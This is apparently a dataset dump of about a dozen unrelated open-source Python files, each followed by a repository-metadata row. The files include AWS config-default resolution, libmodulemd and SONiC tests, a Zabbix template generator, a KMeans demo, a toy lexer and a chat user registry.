    async def merge_smart_defaults(self, config_store, mode, region_name):
        """Apply the default config values for *mode* into *config_store*.

        'auto' is first resolved to a concrete mode for *region_name*; each
        default is then applied via the matching ``_set_<name>`` hook on
        this factory (inherited from the base class), if one exists.
        """
        if mode == 'auto':
            mode = await self.resolve_auto_mode(region_name)
        default_configs = self._default_config_resolver.get_default_config_values(
            mode)
        for config_var in default_configs:
            config_value = default_configs[config_var]
            # Only apply values this factory knows how to set.
            method = getattr(self, f'_set_{config_var}', None)
            if method:
                method(config_store, config_value)

    async def resolve_auto_mode(self, region_name):
        """Resolve the 'auto' defaults mode to 'in-region', 'cross-region'
        or 'standard'.

        The current region is taken from the environment when running in an
        AWS execution environment, otherwise from the (cached) IMDS region
        provider; 'standard' is returned when it cannot be determined.
        """
        current_region = None
        if os.environ.get('AWS_EXECUTION_ENV'):
            default_region = os.environ.get('AWS_DEFAULT_REGION')
            current_region = os.environ.get('AWS_REGION', default_region)
        if not current_region:
            if self._instance_metadata_region:
                # Reuse the region previously fetched from IMDS.
                current_region = self._instance_metadata_region
            else:
                try:
                    current_region = \
                        await self._imds_region_provider.provide()
                    self._instance_metadata_region = current_region
                except Exception:
                    # Best-effort: IMDS may be unreachable off-EC2; fall
                    # through to 'standard'.
                    pass
        if current_region:
            if region_name == current_region:
                return 'in-region'
            else:
                return 'cross-region'
        return 'standard'
| 40.105263 | 82 | 0.621391 | 1,449 | 0.950787 | 0 | 0 | 0 | 0 | 1,364 | 0.895013 | 112 | 0.073491 |
57fbd59102d12bea08762357826a983d63184e28 | 3,302 | py | Python | modulemd/tests/ModulemdTests/module.py | val-verde/libmodulemd | 1a032da198333ee77bdbe4be65e60eb4115ea73f | [
"MIT"
] | 28 | 2017-12-07T11:42:21.000Z | 2021-09-20T17:34:40.000Z | modulemd/tests/ModulemdTests/module.py | val-verde/libmodulemd | 1a032da198333ee77bdbe4be65e60eb4115ea73f | [
"MIT"
] | 413 | 2018-01-05T15:53:01.000Z | 2022-03-31T11:45:52.000Z | modulemd/tests/ModulemdTests/module.py | val-verde/libmodulemd | 1a032da198333ee77bdbe4be65e60eb4115ea73f | [
"MIT"
] | 72 | 2018-01-15T13:38:34.000Z | 2022-03-15T06:08:27.000Z | #!/usr/bin/python3
# This file is part of libmodulemd
# Copyright (C) 2017-2018 Stephen Gallagher
#
# Fedora-License-Identifier: MIT
# SPDX-2.0-License-Identifier: MIT
# SPDX-3.0-License-Identifier: MIT
#
# This program is free software.
# For more information on the license, see COPYING.
# For more information on free software, see
# <https://www.gnu.org/philosophy/free-sw.en.html>.
from os import path
import sys
try:
import unittest
import gi
gi.require_version("Modulemd", "2.0")
from gi.repository import Modulemd
from gi.repository.Modulemd import ModuleIndex
from gi.repository import GLib
except ImportError:
# Return error 77 to skip this test on platforms without the necessary
# python modules
sys.exit(77)
from base import TestBase
class TestModule(TestBase):
def test_search_streams(self):
idx = Modulemd.ModuleIndex.new()
idx.update_from_file(path.join(self.test_data_path, "f29.yaml"), True)
module = idx.get_module("nodejs")
self.assertEqual(len(module.search_streams("8", 0)), 1)
self.assertEqual(len(module.search_streams("10", 0)), 1)
def test_copy_with_obsoletes(self):
idx = Modulemd.ModuleIndex.new()
e = Modulemd.Obsoletes.new(1, 2, "testmodule", "teststream", "testmsg")
e.set_obsoleted_by("module_obsoleter", "stream_obsoleter")
idx.add_obsoletes(e)
m = idx.get_module("testmodule")
assert m
assert m.get_module_name() == "testmodule"
obsoletes_from_orig = m.get_newest_active_obsoletes("teststream", None)
assert (
obsoletes_from_orig.get_obsoleted_by_module_name()
== "module_obsoleter"
)
m_copy = m.copy()
assert m_copy.get_module_name() == "testmodule"
obsoletes_from_copy = m_copy.get_newest_active_obsoletes(
"teststream", None
)
assert (
obsoletes_from_copy.get_obsoleted_by_module_name()
== "module_obsoleter"
)
def test_adding_obsoletes_is_order_independent(self):
obsoletes_without_context = """
---
document: modulemd-obsoletes
version: 1
data:
module: nodejs
stream: 10
context: deadbeef
modified: 2019-07-27T00:00Z
message: test message
obsoleted_by:
module: nodejs
stream: 12
...
"""
obsoletes_with_context = """
---
document: modulemd-obsoletes
version: 1
data:
module: nodejs
stream: 10
modified: 2019-09-27T00:00Z
message: test message
obsoleted_by:
module: nodejs
stream: 14
...
"""
for ordered_yaml in [
obsoletes_without_context + obsoletes_with_context,
obsoletes_with_context + obsoletes_without_context,
]:
idx = ModuleIndex.new()
stream = Modulemd.ModuleStream.new(2, "nodejs", "10")
stream.props.context = "deadbeef"
res = idx.add_module_stream(stream)
res, failures = idx.update_from_string(ordered_yaml, True)
m = idx.get_module("nodejs")
streams = m.get_all_streams()
s = streams[0]
assert (
s.get_obsoletes_resolved().get_obsoleted_by_module_stream()
== "14"
)
if __name__ == "__main__":
unittest.main()
| 27.747899 | 79 | 0.650212 | 2,462 | 0.745609 | 0 | 0 | 0 | 0 | 0 | 0 | 1,120 | 0.339188 |
57fc26e3bdf52a1c99cfa051147497ae4c466ad2 | 2,268 | py | Python | tests/stress/conftest.py | lolyu/sonic-mgmt | ed888fd1ce26e7f44fd7f70af00c43ace4882668 | [
"Apache-2.0"
] | 132 | 2016-10-19T12:34:44.000Z | 2022-03-16T09:00:39.000Z | tests/stress/conftest.py | lolyu/sonic-mgmt | ed888fd1ce26e7f44fd7f70af00c43ace4882668 | [
"Apache-2.0"
] | 3,152 | 2016-09-21T23:05:58.000Z | 2022-03-31T23:29:08.000Z | tests/stress/conftest.py | lolyu/sonic-mgmt | ed888fd1ce26e7f44fd7f70af00c43ace4882668 | [
"Apache-2.0"
] | 563 | 2016-09-20T01:00:15.000Z | 2022-03-31T22:43:54.000Z | import logging
import pytest
from tests.common.utilities import wait_until
from utils import get_crm_resources, check_queue_status, sleep_to_wait
CRM_POLLING_INTERVAL = 1
CRM_DEFAULT_POLL_INTERVAL = 300
MAX_WAIT_TIME = 120
logger = logging.getLogger(__name__)
@pytest.fixture(scope='module')
def get_function_conpleteness_level(pytestconfig):
return pytestconfig.getoption("--completeness_level")
@pytest.fixture(scope="module", autouse=True)
def set_polling_interval(duthost):
wait_time = 2
duthost.command("crm config polling interval {}".format(CRM_POLLING_INTERVAL))
logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
yield
duthost.command("crm config polling interval {}".format(CRM_DEFAULT_POLL_INTERVAL))
logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
@pytest.fixture(scope='module')
def withdraw_and_announce_existing_routes(duthost, localhost, tbinfo):
    """Withdraw all existing IPv4/IPv6 routes for the duration of the module.

    Yields the CRM ipv4/ipv6 route usage measured after the withdrawal;
    the routes are re-announced during teardown.
    """
    ptf_ip = tbinfo["ptf_ip"]
    topo_name = tbinfo["topo"]["name"]

    def _push_routes(action, queue, settle_cycles, message):
        # Trigger the route change on the PTF side, wait for the BGP queue
        # to report activity, then let the CRM counters settle.
        logger.info(message)
        localhost.announce_routes(topo_name=topo_name, ptf_ip=ptf_ip, action=action, path="../ansible/")
        wait_until(MAX_WAIT_TIME, CRM_POLLING_INTERVAL, 0, lambda: check_queue_status(duthost, queue) == True)
        sleep_to_wait(CRM_POLLING_INTERVAL * settle_cycles)

    _push_routes("withdraw", "inq", 100, "withdraw existing ipv4 and ipv6 routes")

    ipv4_route_used_before = get_crm_resources(duthost, "ipv4_route", "used")
    ipv6_route_used_before = get_crm_resources(duthost, "ipv6_route", "used")
    logger.info("ipv4 route used {}".format(ipv4_route_used_before))
    logger.info("ipv6 route used {}".format(ipv6_route_used_before))

    yield ipv4_route_used_before, ipv6_route_used_before

    _push_routes("announce", "outq", 5, "announce existing ipv4 and ipv6 routes")
    logger.info("ipv4 route used {}".format(get_crm_resources(duthost, "ipv4_route", "used")))
    logger.info("ipv6 route used {}".format(get_crm_resources(duthost, "ipv6_route", "used")))
| 39.103448 | 107 | 0.761023 | 0 | 0 | 1,777 | 0.78351 | 1,995 | 0.87963 | 0 | 0 | 521 | 0.229718 |
57fc5340cf68c5714f41b1dafe33f998bca42b55 | 7,991 | py | Python | mamonsu/lib/zbx_template.py | dan-aksenov/mamonsu | c4822b48974e870af91910515fd7f11e4b8b41b3 | [
"BSD-3-Clause"
] | null | null | null | mamonsu/lib/zbx_template.py | dan-aksenov/mamonsu | c4822b48974e870af91910515fd7f11e4b8b41b3 | [
"BSD-3-Clause"
] | null | null | null | mamonsu/lib/zbx_template.py | dan-aksenov/mamonsu | c4822b48974e870af91910515fd7f11e4b8b41b3 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from mamonsu.lib.const import Template
class ZbxTemplate(object):
    """Builds a Zabbix 2.0 XML template export from plugin-provided data.

    Plugins contribute items, triggers, graphs and discovery rules;
    ``xml()`` stitches their output into the ``mainTemplate`` skeleton.
    """

    # XML skeleton of the export; the {placeholders} are filled in by xml().
    mainTemplate = u"""<?xml version="1.0" encoding="UTF-8"?>
<zabbix_export>
<version>2.0</version>
<groups>
<group>
<name>Templates</name>
</group>
</groups>
<templates>
<template>
<template>{template}</template>
<name>{template}</name>
<groups>
<group>
<name>Templates</name>
</group>
</groups>
<applications>
<application>
<name>{application}</name>
</application>
</applications>
<items>{items}</items>
<discovery_rules>{discovery_rules}</discovery_rules>
<macros>{macros}</macros>
</template>
</templates>
<triggers>{triggers}</triggers>
<graphs>{graphs}</graphs>
</zabbix_export>"""

    # Default (tag, value) pairs for an <item>; a None value renders as a
    # self-closing tag (see _format_args).  Field list per the Zabbix API:
    # https://www.zabbix.com/documentation/2.0/manual/appendix/api/item/definitions
    item_defaults = [
        ('name', None), ('type', 2), ('snmp_community', None),
        ('multiplier', 0), ('inventory_link', 0),
        ('key', None), ('snmp_oid', None), ('history', 7),
        ('trends', 365), ('status', 0), ('delay', 60),
        ('value_type', Template.VALUE_TYPE.numeric_float),
        ('allowed_hosts', None), ('valuemap', None),
        ('units', Template.UNITS.none), ('delta', Template.DELTA.as_is),
        ('snmpv3_contextname', None), ('snmpv3_securityname', None),
        ('snmpv3_securitylevel', 0), ('snmpv3_authprotocol', 0),
        ('snmpv3_authpassphrase', None), ('snmpv3_privprotocol', 0),
        ('snmpv3_privpassphrase', None), ('formula', 1),
        ('delay_flex', None), ('params', None),
        ('ipmi_sensor', None), ('data_type', 0), ('authtype', 0),
        ('username', None), ('password', None), ('publickey', None),
        ('privatekey', None), ('port', None), ('description', None)
    ]

    # Defaults for a plain <trigger> element.
    trigger_defaults = [
        ('expression', None), ('name', None), ('url', None),
        ('status', 0), ('priority', 3), ('description', None),
        ('type', 0), ('dependencies', None)
    ]

    # Defaults for <trigger_prototype> inside a discovery rule
    # (same as trigger_defaults minus 'dependencies').
    trigger_discovery_defaults = [
        ('expression', None), ('name', None), ('url', None),
        ('status', 0), ('priority', 3), ('description', None),
        ('type', 0)
    ]

    # Defaults for the scalar fields of a <graph>.
    graph_values_defaults = [
        ('name', None), ('width', 900), ('height', 200),
        ('yaxismin', 0.0000), ('yaxismax', 100.0), ('show_work_period', 1),
        ('show_triggers', 1), ('type', 0), ('show_legend', 1),
        ('show_3d', 0), ('percent_left', 0.0), ('percent_right', 0.0),
        ('ymin_type_1', 0), ('ymax_type_1', 0), ('ymin_item_1', 0),
        ('ymax_item_1', 0)
    ]

    # Defaults for each <graph_item> child of a graph.
    graph_items_defaults = [
        ('sortorder', None), ('drawtype', 0),
        ('color', '00CC00'), ('yaxisside', 0),
        ('calc_fnc', 2), ('type', Template.GRAPH_TYPE.normal)
    ]

    # Defaults for a <discovery_rule> element.
    discovery_defaults = [
        ('name', None), ('type', 2), ('snmp_community', None),
        ('snmp_oid', None), ('delay', 60), ('status', 0),
        ('allowed_hosts', None), ('snmpv3_contextname', None),
        ('snmpv3_securityname', None), ('snmpv3_securitylevel', 0),
        ('snmpv3_authprotocol', 0), ('snmpv3_authpassphrase', None),
        ('snmpv3_privprotocol', 0), ('snmpv3_privpassphrase', None),
        ('delay_flex', None), ('params', None), ('filter', None),
        ('ipmi_sensor', None), ('authtype', 0),
        ('username', None), ('password', None), ('publickey', None),
        ('privatekey', None), ('port', None), ('lifetime', 7),
        ('description', None), ('key', None)
    ]

    def __init__(self, name, app):
        """Store the template and application names used in the export."""
        self.Application = app
        self.Template = name

    def xml(self, plugins=[]):
        """Return the complete XML export built from *plugins*.

        NOTE(review): the mutable default argument is kept for interface
        compatibility; the list is sorted in place (mutating the caller's
        list) but never stored on the instance.
        """
        # sort plugins by class name so the output order is deterministic
        plugins.sort(key=lambda x: x.__class__.__name__)
        # create template placeholder values
        template_data = {}
        template_data['template'] = self.Template
        template_data['application'] = self.Application
        template_data['items'] = self._get_all('items', plugins)
        template_data['macros'] = ''
        template_data['triggers'] = self._get_all('triggers', plugins)
        template_data['graphs'] = self._get_all('graphs', plugins)
        template_data['discovery_rules'] = self._get_all(
            'discovery_rules', plugins)
        return self.mainTemplate.format(**template_data)

    def _get_all(self, items='items', plugins=[]):
        """Concatenate the XML from calling ``plugin.<items>(self)`` on every
        plugin; plugins that return None are skipped."""
        result = ''
        for plugin in plugins:
            row = getattr(plugin, items)(self)
            if row is None:
                continue
            result += row
        return result

    def item(self, args={}, xml_key='item'):
        """Render one <item> (or <item_prototype>) element, including the
        <applications> wrapper."""
        return '<{2}>{0}{1}</{2}>'.format(
            self._format_args(self.item_defaults, args),
            self._application(),
            xml_key)

    def trigger(self, args={}, xml_key='trigger', defaults=None):
        """Render one <trigger> element.

        The placeholder '#TEMPLATE' inside the expression is replaced with
        the template name.  NOTE(review): mutates args['expression'].

        :raises LookupError: if args has no 'expression' key.
        """
        if defaults is None:
            defaults = self.trigger_defaults
        try:
            expression = args['expression']
        except KeyError:
            raise LookupError(
                'Miss expression in trigger: {0}.'.format(args))
        args['expression'] = expression.replace('#TEMPLATE', self.Template)
        return '<{1}>{0}</{1}>'.format(
            self._format_args(defaults, args),
            xml_key)

    def graph(self, args={}, xml_key='graph'):
        """Render one <graph> element with its <graph_items> children.

        :raises LookupError: if args has no 'items' key, or a graph item
            has no 'key'.
        """
        try:
            items = args['items']
        except KeyError:
            raise LookupError(
                'Miss item in graph: {0}.'.format(args))
        graph_items = ''
        for idx, item in enumerate(items):
            try:
                key = item['key']
            except KeyError:
                raise LookupError(
                    'Missed key in graph item: {0}.'.format(item))
            if 'sortorder' not in item:
                # default draw order follows list position (mutates item)
                item['sortorder'] = idx
            row = '<graph_item>{0}<item><host>{1}'
            row += '</host><key>{2}</key></item></graph_item>'
            graph_items += row.format(
                self._format_args(self.graph_items_defaults, item),
                self.Template, key)
        result = '<{2}>{0}<graph_items>{1}</graph_items></{2}>'
        return result.format(
            self._format_args(self.graph_values_defaults, args),
            graph_items, xml_key)

    def discovery_rule(self, rule={}, items=[], triggers=[], graphs=[]):
        """Render a <discovery_rule> with its item/trigger/graph prototypes."""
        result_items = '<item_prototypes>'
        for item in items:
            result_items += self.item(item, xml_key='item_prototype')
        result_items += '</item_prototypes>'
        result_triggers = '<trigger_prototypes>'
        for trigger in triggers:
            result_triggers += self.trigger(
                trigger, xml_key='trigger_prototype',
                defaults=self.trigger_discovery_defaults)
        result_triggers += '</trigger_prototypes>'
        result_graphs = '<graph_prototypes>'
        for graph in graphs:
            result_graphs += self.graph(
                graph, xml_key='graph_prototype')
        result_graphs += '</graph_prototypes>'
        result = '<discovery_rule>{0}{1}{2}{3}</discovery_rule>'
        return result.format(
            self._format_args(self.discovery_defaults, rule),
            result_items, result_triggers, result_graphs)

    def _application(self):
        """Render the <applications> wrapper for this template's application."""
        result = '<applications><application><name>{0}'
        result += '</name></application></applications>'
        return result.format(self.Application)

    def _format_args(self, defaults, override):
        """Render *defaults* as XML tags, with *override* values taking
        precedence; a None value becomes a self-closing tag."""
        result = ''
        for pair in defaults:
            key = pair[0]
            try:
                val = override[key]
            except KeyError:
                val = pair[1]
            if val is None:
                row = '<{0}/>'.format(key)
            else:
                row = '<{0}>{1}</{0}>'.format(key, val)
            result += row
        return result
| 37.167442 | 79 | 0.541359 | 7,924 | 0.991616 | 0 | 0 | 0 | 0 | 0 | 0 | 2,934 | 0.367163 |
17a84420e19ce12f3b716bc7024aa29937242930 | 1,164 | py | Python | src/rhasspy_desktop_satellite/exceptions.py | mcorino/rhasspy-desktop-satellite | aeaa820a0acdcc2e70db1f74157a0c7d3ac5d4bd | [
"MIT"
] | null | null | null | src/rhasspy_desktop_satellite/exceptions.py | mcorino/rhasspy-desktop-satellite | aeaa820a0acdcc2e70db1f74157a0c7d3ac5d4bd | [
"MIT"
] | null | null | null | src/rhasspy_desktop_satellite/exceptions.py | mcorino/rhasspy-desktop-satellite | aeaa820a0acdcc2e70db1f74157a0c7d3ac5d4bd | [
"MIT"
] | null | null | null | """This module contains exceptions defined for Rhasspy Desktop Satellite."""
class RDSatelliteServerError(Exception):
    """Base class for exceptions raised by Rhasspy Desktop Satellite code.

    By catching this exception type, you catch all exceptions that are
    defined by the Rhasspy Desktop Satellite code."""
class ConfigurationFileNotFoundError(RDSatelliteServerError):
    """Raised when the configuration file is not found."""

    def __init__(self, filename):
        """Initialize the exception with a string representing the filename."""
        # Path of the configuration file that could not be found.
        self.filename = filename
class NoDefaultAudioDeviceError(RDSatelliteServerError):
    """Raised when there's no default audio device available."""

    def __init__(self, inout):
        """Initialize the exception with a string representing input or output.
        """
        # Which direction lacked a default device ("input" or "output"
        # presumably -- set by the caller).
        self.inout = inout
class UnsupportedPlatformError(RDSatelliteServerError):
    """Raised when the platform Rhasspy Desktop Satellite is running on is not
    supported."""

    def __init__(self, platform):
        """Initialize the exception with a string representing the platform."""
        # Name of the unsupported platform.
        self.platform = platform
| 33.257143 | 79 | 0.726804 | 1,075 | 0.92354 | 0 | 0 | 0 | 0 | 0 | 0 | 697 | 0.598797 |
17a9215dd525fc26ed3417c0d32824c0c0045586 | 1,084 | py | Python | KMeans.py | trinity652/Skin-Cancer-Classification | 257be485b84077440be77cf14b5e40d9a6765f94 | [
"MIT"
] | 16 | 2018-01-23T12:20:04.000Z | 2021-11-05T10:01:20.000Z | KMeans.py | trinity652/Skin-Cancer-Classification | 257be485b84077440be77cf14b5e40d9a6765f94 | [
"MIT"
] | null | null | null | KMeans.py | trinity652/Skin-Cancer-Classification | 257be485b84077440be77cf14b5e40d9a6765f94 | [
"MIT"
] | 1 | 2020-11-29T09:29:27.000Z | 2020-11-29T09:29:27.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 30 17:48:49 2017
@author: abhilasha
Using SKLearns API for performing Kmeans clustering.
Using sklearn.datasets.make_blobs for generating randomized gaussians
for clustering.
"""
import numpy as np
from matplotlib import pyplot as plt
from sklearn.cluster import KMeans
from sklearn.datasets import make_blobs
# ----------------------------------------------------------------------
# Create a sample dataset to exercise KMeans, using make_blobs to draw
# randomized Gaussian clusters.
# ----------------------------------------------------------------------
n_samples = 1000
n_features = 5
n_clusters = 3

# X: (n_samples, n_features) generated samples;
# y: integer label for the cluster membership of each sample.
X, y = make_blobs(n_samples, n_features)

# Fit KMeans and predict a cluster index for every sample.
ret = KMeans(n_clusters=n_clusters).fit_predict(X)
print(ret)

# Plot the first two feature dimensions: raw data on top, the KMeans
# partition (colored by predicted cluster) below.
fig, ax = plt.subplots(2)
ax[0].scatter(X[:, 0], X[:, 1])
ax[0].set_title("Initial Scatter Distribution")
ax[1].scatter(X[:, 0], X[:, 1], c=ret)
ax[1].set_title("Colored Partition denoting Clusters")
plt.show()
| 22.583333 | 81 | 0.725092 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 632 | 0.583026 |
17a967eb21d3033ca6492eedc8fc39e1742110e2 | 1,388 | py | Python | test/unit/test_classical_explainer.py | tomdyer10/interpret-text | 0c56fb645de882e31f0623afdb949d3b8f9c6aad | [
"MIT"
] | 1 | 2020-08-28T05:13:22.000Z | 2020-08-28T05:13:22.000Z | test/unit/test_classical_explainer.py | nehalecky/interpret-text | 62a5e7406bf5c7d2df69648a278082d602e88dd6 | [
"MIT"
] | null | null | null | test/unit/test_classical_explainer.py | nehalecky/interpret-text | 62a5e7406bf5c7d2df69648a278082d602e88dd6 | [
"MIT"
] | null | null | null | # ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
# Tests for classical explainer
from interpret_text.experimental.classical import ClassicalTextExplainer
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from utils_test import get_mnli_test_dataset
# Sample sentence fed to explain_local in the test below.
DOCUMENT = "rare bird has more than enough charm to make it memorable."
class TestClassicalExplainer(object):
    """Unit tests for the classical (linear-model) text explainer."""

    def test_working(self):
        """Smoke test: the test harness itself runs."""
        assert True

    def test_explain_model_local(self):
        """
        Test for explain_local of classical explainer
        :return:
        """
        train_df = get_mnli_test_dataset('train')
        sentences = train_df['sentence1']
        genres = train_df['genre']
        X_train, X_test, y_train, y_test = train_test_split(sentences, genres, train_size=0.8, test_size=0.2)
        encoder = LabelEncoder()
        y_train = encoder.fit_transform(y_train)
        explainer = ClassicalTextExplainer()
        classifier, best_params = explainer.fit(X_train, y_train)
        explainer.preprocessor.labelEncoder = encoder
        explanation = explainer.explain_local(DOCUMENT)
        # One importance value per extracted feature.
        assert len(explanation.local_importance_values) == len(explanation.features)
| 38.555556 | 106 | 0.672911 | 881 | 0.634726 | 0 | 0 | 0 | 0 | 0 | 0 | 379 | 0.273055 |
17a96a19e673a02ce4216b998f3cb8431e172a1f | 1,378 | py | Python | create_python_app/main.py | xuchaoqian/create-python-app | 70745432b972b96a3faf95a378d54d922b77f2be | [
"MIT"
] | null | null | null | create_python_app/main.py | xuchaoqian/create-python-app | 70745432b972b96a3faf95a378d54d922b77f2be | [
"MIT"
] | null | null | null | create_python_app/main.py | xuchaoqian/create-python-app | 70745432b972b96a3faf95a378d54d922b77f2be | [
"MIT"
] | null | null | null | import argparse
from create_python_app.path_utils import *
from create_python_app.create_gitignore_file import create_gitignore_file
from create_python_app.create_license_file import create_license_file
from create_python_app.create_makefile_file import create_makefile_file
from create_python_app.create_readme_file import create_readme_file
from create_python_app.create_requirements_file import create_requirements_file
from create_python_app.create_setup_file import create_setup_file
from create_python_app.create_root_package import create_root_package
from create_python_app.create_config_files import create_config_files
from create_python_app.create_config_module import create_config_module
def _parse():
parser = argparse.ArgumentParser()
parser.add_argument("--name", required=True, type=str)
args = parser.parse_args()
return args.name
def main():
    """Scaffold a new Python application in the current working directory."""
    app_name = _parse()
    base_dir = create_dir(os.getcwd(), app_name)
    # (creator, needs_app_name) pairs, executed in the original order.
    steps = (
        (create_gitignore_file, False),
        (create_license_file, False),
        (create_makefile_file, True),
        (create_readme_file, True),
        (create_requirements_file, False),
        (create_setup_file, False),
        (create_root_package, True),
        (create_config_files, False),
        (create_config_module, True),
    )
    for creator, needs_name in steps:
        if needs_name:
            creator(base_dir, app_name=app_name)
        else:
            creator(base_dir)
# Script entry point.
if __name__ == '__main__':
    main()
17ab540dcdbf37fd31ad32aaf93a82fb1d9028a9 | 1,113 | py | Python | Lexical Analyzer.py | amitnandi04/Compiler_Construction | d9e18735b74fdacab76ed892a9b8fb3ae50c49ce | [
"Unlicense"
] | null | null | null | Lexical Analyzer.py | amitnandi04/Compiler_Construction | d9e18735b74fdacab76ed892a9b8fb3ae50c49ce | [
"Unlicense"
] | null | null | null | Lexical Analyzer.py | amitnandi04/Compiler_Construction | d9e18735b74fdacab76ed892a9b8fb3ae50c49ce | [
"Unlicense"
] | null | null | null | # Lexical Analyzer
import re  # regex used to classify identifier and integer tokens

# Token stream produced by the analyzer: a list of [TYPE, lexeme] pairs.
tokens = []

# Toy source program, split on whitespace into candidate lexemes.
source_code = 'int result = 100;'.split()

# Classify each source-code word.
for word in source_code:
    # Datatype declaration keywords.
    if word in ['str', 'int', 'bool']:
        tokens.append(['DATATYPE', word])
    # Identifiers: anything starting with a letter (keywords were matched
    # above).  Merges the original's two separate [a-z]/[A-Z] checks.
    elif re.match(r"[A-Za-z]", word):
        tokens.append(['IDENTIFIER', word])
    # Single-character arithmetic/assignment operators.
    elif word in '*-/+%=':
        tokens.append(['OPERATOR', word])
    # Integer literals, optionally terminated by a statement-ending ';'.
    # Fixed: the original pattern ".[0-9]" required at least two
    # characters, so single-digit integers such as "7" were dropped.
    elif re.match(r"[0-9]", word):
        if word[-1] == ';':
            tokens.append(["INTEGER", word[:-1]])
            tokens.append(['END_STATEMENT', ';'])
        else:
            tokens.append(["INTEGER", word])

print(tokens)  # Outputs the token array
17ac5c168ff8f7e5043d020dc537567d52acfba3 | 5,114 | py | Python | user.py | genba2/pinybotbeta-enhanced | 564ae7c363ee00ad2ae0e05d74e08e58de3d1d2f | [
"MIT"
] | null | null | null | user.py | genba2/pinybotbeta-enhanced | 564ae7c363ee00ad2ae0e05d74e08e58de3d1d2f | [
"MIT"
] | null | null | null | user.py | genba2/pinybotbeta-enhanced | 564ae7c363ee00ad2ae0e05d74e08e58de3d1d2f | [
"MIT"
] | null | null | null | import time
class User:
"""
A class representing a users information.
NOTE: Defaults are attributes that pinylib expects
"""
def __init__(self, **kwargs):
# Default's.
self.lf = kwargs.get('lf')
self.account = kwargs.get('account', '')
self.is_owner = kwargs.get('own', False)
self.gp = kwargs.get('gp', 0)
self.alevel = kwargs.get('alevel', '')
self.bf = kwargs.get('bf', False)
self.nick = kwargs.get('nick')
self.btype = kwargs.get('btype', '')
self.id = kwargs.get('id', -1)
self.stype = kwargs.get('stype', 0)
self.is_mod = kwargs.get('mod', False)
self.join_time = time.time()
self.tinychat_id = None
self.last_login = None
self.user_level = 0
# Extras.
self.last_msg = None
self.screened = False
class Users:
    """
    This class represents the users in the room.

    Each user nick is a dict key whose value is a User object.
    It contains methods to do various user based operations with.
    """

    def __init__(self):
        # Maps nick (str) -> User.
        self._users = dict()

    @property
    def all(self):
        """
        All the users in the room.

        :return: dict of nick -> User.
        """
        return self._users

    @property
    def mods(self):
        """List of all moderator User objects in the room."""
        return [user for user in self._users.values() if user.is_mod]

    @property
    def signed_in(self):
        """List of all User objects signed in with an account."""
        return [user for user in self._users.values() if user.account]

    @property
    def nli(self):
        """List of all User objects NOT signed in (no account)."""
        return [user for user in self._users.values() if not user.account]

    @property
    def lurkers(self):
        """List of all lurker User objects in the room."""
        return [user for user in self._users.values() if user.lf]

    @property
    def norms(self):
        """List of normal users: neither moderators nor lurkers."""
        return [user for user in self._users.values()
                if not user.is_mod and not user.lf]

    def clear(self):
        """ Delete all the users. """
        self._users.clear()

    def add(self, user_info):
        """
        Add a user to the users dict.

        If the nick already exists the existing entry is kept unchanged.

        :param user_info: dict, tinychat user info (must contain 'nick').
        :return: the User object stored for that nick.
        """
        nick = user_info['nick']
        if nick not in self._users:
            self._users[nick] = User(**user_info)
        return self._users[nick]

    def change(self, old_nick, new_nick, user_info):
        """
        Change a user nickname.

        :param old_nick: str the user's old nickname.
        :param new_nick: str the user's new nickname.
        :param user_info: object, the user's user info (User)
        :return: True if changed, else False.
        """
        if not self.delete(old_nick):
            return False
        if new_nick in self._users:
            # NOTE: matches the original behavior -- the old entry is
            # already gone even though the rename failed.
            return False
        self._users[new_nick] = user_info
        return True

    def delete(self, user_name):
        """
        Delete a user from the Users class.

        :param user_name: str the user to delete.
        :return: True if deleted, else False.
        """
        try:
            del self._users[user_name]
        except KeyError:
            return False
        return True

    def search(self, user_name):
        """
        Search the Users class by nick name for a user.

        :param user_name: str the user to find.
        :return: the User object if found, else None.
        """
        return self._users.get(user_name)

    def search_by_id(self, user_id):
        """
        Search for a user by id.

        Fixed per the old TODO: ``return None`` now happens only after ALL
        users have been checked, never on the first non-matching entry.

        :param user_id: str the user's ID.
        :return: the User object if found, else None.
        """
        for user in self._users.values():
            if str(user.id) == user_id:
                return user
        return None
| 30.082353 | 113 | 0.553969 | 5,096 | 0.99648 | 0 | 0 | 1,732 | 0.338678 | 0 | 0 | 2,247 | 0.439382 |
17afc776c10c0b9ba372d9ed2ac769c202c71e90 | 2,696 | py | Python | my_python_module/exceptions.py | a358003542/wanze_python_project | db52515af80319000e9a47a7b02f3ccd2cf46afd | [
"MIT"
] | 1 | 2020-10-30T08:54:22.000Z | 2020-10-30T08:54:22.000Z | my_python_module/exceptions.py | a358003542/wanze_python_project | db52515af80319000e9a47a7b02f3ccd2cf46afd | [
"MIT"
] | null | null | null | my_python_module/exceptions.py | a358003542/wanze_python_project | db52515af80319000e9a47a7b02f3ccd2cf46afd | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Reference chart of Python's built-in exception hierarchy:
+-- Exception
+-- StopIteration
+-- StopAsyncIteration
+-- ArithmeticError
| +-- FloatingPointError
| +-- OverflowError
| +-- ZeroDivisionError
+-- AssertionError
+-- AttributeError
+-- BufferError
+-- EOFError
+-- ImportError
| +-- ModuleNotFoundError
+-- LookupError
| +-- IndexError
| +-- KeyError
+-- MemoryError
+-- NameError
| +-- UnboundLocalError
+-- OSError
| +-- BlockingIOError
| +-- ChildProcessError
| +-- ConnectionError
| | +-- BrokenPipeError
| | +-- ConnectionAbortedError
| | +-- ConnectionRefusedError
| | +-- ConnectionResetError
| +-- FileExistsError
| +-- FileNotFoundError
| +-- InterruptedError
| +-- IsADirectoryError
| +-- NotADirectoryError
| +-- PermissionError
| +-- ProcessLookupError
| +-- TimeoutError
+-- ReferenceError
+-- RuntimeError
| +-- NotImplementedError
| +-- RecursionError
+-- SyntaxError
| +-- IndentationError
| +-- TabError
+-- SystemError
+-- TypeError
+-- ValueError
| +-- UnicodeError
| +-- UnicodeDecodeError
| +-- UnicodeEncodeError
| +-- UnicodeTranslateError
+-- Warning
+-- DeprecationWarning
+-- PendingDeprecationWarning
+-- RuntimeWarning
+-- SyntaxWarning
